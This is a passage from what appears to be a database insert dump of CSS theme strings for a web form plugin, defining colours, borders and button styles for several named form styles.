\n}\n.ch_rad_label\n{\ndisplay:inline !important; \nmargin-left:5px !important; \nmargin-right:15px !important; \nfloat:none !important; \ncolor:#000 !important; \n}\n.label\n{\nborder:none !important; \ncolor:#000 !important; \n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important; \nvertical-align:middle !important; \ncolor:#000 !important; \n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important; \n}\n.am_pm_select\n{\nheight:21px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \n}\n.input_deactive\n{\ncolor:#999999 !important; \nfont-style:italic !important; \nborder-width:1px !important; \nmargin: 1px !important; \npadding: 1px !important; \nborder-radius:0px !important; \nheight:16px; \n}\n.input_active\n{\ncolor:#000000 !important; \nfont-style:normal !important; \nborder-width:1px !important; \nmargin: 1px !important; \npadding: 1px !important; \nborder-radius:0px !important; \nheight:16px; \n}\n.required\n{\nborder:none !important; \ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important; \nmargin: 0px !important; \npadding: 0px !important; \ncursor:pointer !important; \n}\n.captcha_refresh\n{\nwidth:30px !important; \nheight:30px !important; \nborder-width:0px !important; \nmargin: 0px !important; \npadding: 0px !important; \nvertical-align:middle !important; \ncursor:pointer !important; \nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important; \n}\n.captcha_input\n{\nheight:20px !important; \nborder-width:1px !important; \nmargin: 0px !important; \npadding: 0px !important; \nvertical-align:middle !important; \n}\n.file_upload {\nborder: 0px solid white !important; \nborder-radius: 0px !important; \nmargin: 0px !important; \npadding: 0px !important; \ncolor: black !important; \nbackground-color: white !important; \n} \n.page_deactive\n{\ncolor:#000 !important; \nborder: 1px solid black !important; \npadding:4px 7px 4px 7px !important; \nmargin:4px !important; \ncursor:pointer !important; \nbackground-color:#FFF000 !important; \n}\n.page_active\n{\ncolor:#000000 !important; \nfont-weight:bold !important; \nborder: 3px double black !important; \npadding:4px 7px 4px 7px !important; \nmargin:4px !important; \ncursor:pointer !important; \nbackground-color:#ffffff !important; \nbox-shadow: 0px 0px 0px 0px black !important; \n}\n.page_percentage_active\n{\npadding:0px !important; \nmargin:0px !important; \nborder-spacing: 0px !important; \nheight:20px !important; \nline-height:20px !important; \nbackground-color:#FFF000 !important; \nborder-radius: 0em 4em 1em 0em !important; \nfont-size:15px !important; \nfloat:left !important; \ntext-align: right  !important;  \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important; \n}\n.page_percentage_deactive\n{\nheight:20px !important; \nline-height:20px !important; \nborder:1px solid black !important; \nbackground-color:#ffffff !important; \nborder-radius:0px !important; \ntext-align: left  !important;  \npadding:5px !important; \n}\n.page_numbers\n{\nfont-size:11px !important; \ncolor:#000 !important; \n}\n.phone_area_code\n{\nwidth:50px !important; \n}\n.phone_number\n{\nwidth:100px !important; \n}\n.button_submit\n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width: 80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color:#F53E04 !important; \nborder: 0px solid #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\n.button_reset\n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width: 80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color:#F53E04 !important; \nborder: 0px solid #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\n.wdform_button button \n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width: 80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color: #F53E04 !important; \nborder: 0px solid #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\n.other_input\n{\nborder-radius:0px !important; \nborder-width: 1px !important; \nheight:16px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \nmargin-left: 25px !important; \n}\nbutton.wdform_page_button\n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width:80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color:#F53E04 !important; \nborder: 0px solid  #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\nspan.wdform_page_button\n{\ncolor:#000 !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nmargin: 5px !important; \ncursor:pointer !important; \n}\n.wdform_page_navigation\n{\ntext-align:center  !important; \nmargin-bottom:10px !important; \n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important; \ncolor:#000000 !important; \nfont-weight:bold !important; \n}\n.wdform_percentage_title\n{\ncolor:#000000 !important; \nfont-style:italic !important; \nmargin: 0px 0px 0px 30px !important; \n}', 0),
(13, 'Style 2 DarkRed', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:inherit;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n        padding-left:inherit !important;\n		padding-right:inherit !important;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#A31919 !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#A31919 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#A31919 !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(14, 'Style 3 Transparent', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\ncolor:#000 !important;\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-color:transparent !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:transparent !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\n	font-family: ''Times New Roman'' !important;\nmargin:0px -30px 0px 0px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\n	font-family: ''Times New Roman'' !important;\ncolor:#000 !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}', 0),
(15, 'Style 3 Red', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left !important;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#AB0101 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select 